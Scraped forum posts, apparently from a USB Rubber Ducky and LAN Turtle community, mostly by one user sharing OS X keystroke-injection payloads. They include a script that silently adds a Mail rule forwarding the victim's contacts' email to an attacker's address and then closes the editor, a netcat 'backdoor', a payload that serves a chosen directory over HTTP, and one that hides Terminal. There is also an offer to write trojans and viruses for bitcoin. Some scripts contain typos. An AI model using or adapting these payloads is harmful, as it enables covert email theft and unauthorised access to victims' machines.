[OS X Malware Writing]

I am not sure if this is the right bored to be talking about this

I am willing to code Trojans,Viruses,Bots and any other type of malware in exchange for bitcoins.

It could do just about anything you want example:

Backdoor a system, Destroy the entire computer, Delete files, Record video and audio, etc

pm me if your interested

[OS X Directory Server]

This simple payload opens Terminal, moves to a directory and then creates a http server that you can go and download those files.

You may want to change directory and the server port. In the payload the port is 8000

DELAY 1500

GUI SPACE

DELAY 300

STRING Terminal

DELAY 200

ENTER

DELAY 500

STRING cd (directory to show)

ENTER

STRING python -m SimpleHTTPServer 8000

ENTER

GUI M

Directory Server.txt

[Flash firmware OS X]

56 minutes ago, n3uron said:

On MacOS:

1. Get dfu-programmer from homebrew.
2. Get hex file from github.  (Click on raw version, then wget the hyperlink.  Be sure to remember file path where it is saved.)
3. Pull ducky out of machine.  Hold down button while putting back into machine.  No lights should be on, and it will not show up in finder.

Then run these commands in terminal in sequence:

sudo /usr/local/bin/dfu-programmer at32uc3b1256 dump >dump.bin
sudo /usr/local/bin/dfu-programmer at32uc3b1256 reset
sudo /usr/local/bin/dfu-programmer at32uc3b1256 erase
sudo /usr/local/bin/dfu-programmer at32uc3b1256 flash --suppress-bootloader-mem <.hex file path>
sudo /usr/local/bin/dfu-programmer at32uc3b1256 reset

I'll try that

Thanks!

[OS X Hide Terminal]

You could but then you would could not type in the terminal anymore

[OS X Hide Terminal]

Has anyone had any problems with this?

[Flash firmware OS X]

Thanks

None of you have been a help what so ever

 

[Lan turle v.s. public school]

My bad

i meant a good place to start under supervision 

[Lan turle v.s. public school]

Good point

But you always have to start somewhere and schools in my opinion are a great start

[Lan turle v.s. public school]

Be nice

were all pen-testers here 

[Lan turle v.s. public school]

No problem

[Computer Interactions]

When you plug in the Lan Turtle does it interact with the computer itself outside of ethernet?

Sorry if its a dumb question i don't have a lan turtel yet.

[Lan turle v.s. public school]

From what i know the computer only needs to be plugged into a power source (turned on) and the network cable plugged in

That answers 1 & 2

4) You should be able to scan for ip address which may give you some names

5) I believe it will only give you access to the router its plugged into(unless you can hack the others)

 

[OS X Hide Terminal]

This small part of a payload will open the terminal and hide it in the top left of the screen. This is done thanks to a built in tool that allows you to use AppleScript from the terminal. It is called osascript and can be used in many other ways. You can use this at the beginning of a large payload.

REM Coded by HH1
REM hh1rimrock@gmail.com
REM
REM Target:
REM “Mac OS X”
REM
REM Description:
REM This script will open a Terminal window
REM And then shrink and hide it in the top
REM of the screen using osascript
REM 
REM
DELAY 1500
GUI SPACE
DELAY 30
STRING “Terminal”
DELAY 200
ENTER
DELAY 500
STRING osascript \
STRING	-e 'tell application "Terminal"' \
STRING	-e 'set size of front window to {36, 36}' \
STRING	 -e 'set position of front window to {0,25}' \
STRING	 -e 'end tell'
DELAY 200
ENTER
REM
REM You can add whatever you want to the end here
REM Keep in mind a terminal window is alread

 

[OS X & Linux Payload Writing Team]

Does anyone want to write OS X and/or linux payloads together?

 

you can email me at:

hh1rimrock@gmail.com

[Flash firmware OS X]

Does anyone know how to flash new firmware for the ducky on OS X?

Thanks in advance

[Mac OSX Password grabber]

On 9/21/2016 at 11:01 AM, dogo said:

Hi,

I was wondering where I can find payloads for Mac OS X, especially for grabbing usernames and passwords.

 

Thanks in advance.

what kind of passwords were you looking to grab?

 

[OS X Temporary NetCat Backdoor Payload]

This Payload is tested in the latest version of OS X El Capitan. It Simply opens Terminal and starts a reverse NetCat to your computer, when it connects it minimizes the terminal window

You might want to mess around with the delay

DELAY 1000
GUI SPACE
DELAY 200
STRING TERMINAL
DELAY 300
STRING nc -l IPADRESS 8888
DELAY 100
GUI M

 

Temperary NC backdoor.txt

[OS X Applescript Mail Forward Payload]

This payload has been tested on the latest version of OS X El Capitan. It Opens applescript and types in some codes that tells mail to forward all email's from people who are in the users contact to your own private email address. It then deletes the applescript code and opens terminal to quit applescript and terminal.

You might want to mess with the delay

 

DELAY 1500
GUI SPACE
DELAY 300
STRING script editor
DELAY 200
ENTER
DELAY 500
GUI n
DELAY 500
STRING tell application "Mail"
STRING    set newRule to make new rule at end of rules with properties {name:"apple mail", enabled:true, forward message:"Your email address"}
STRING    tell newRule
STRING        make new rule condition at end of rule conditions with properties {rule type:sender is in my contacts}
STRING    end tell
STRING end tell
GUI R
DELAY 600
GUI A
STRING .
GUI SPACE
DELY 300
STRING Terminal
DELAY 300
ENTER
DELAY 500
STRING killall Script\ Editor
DELAY 200
STRING killall Termianl

 

Applescript Email Forward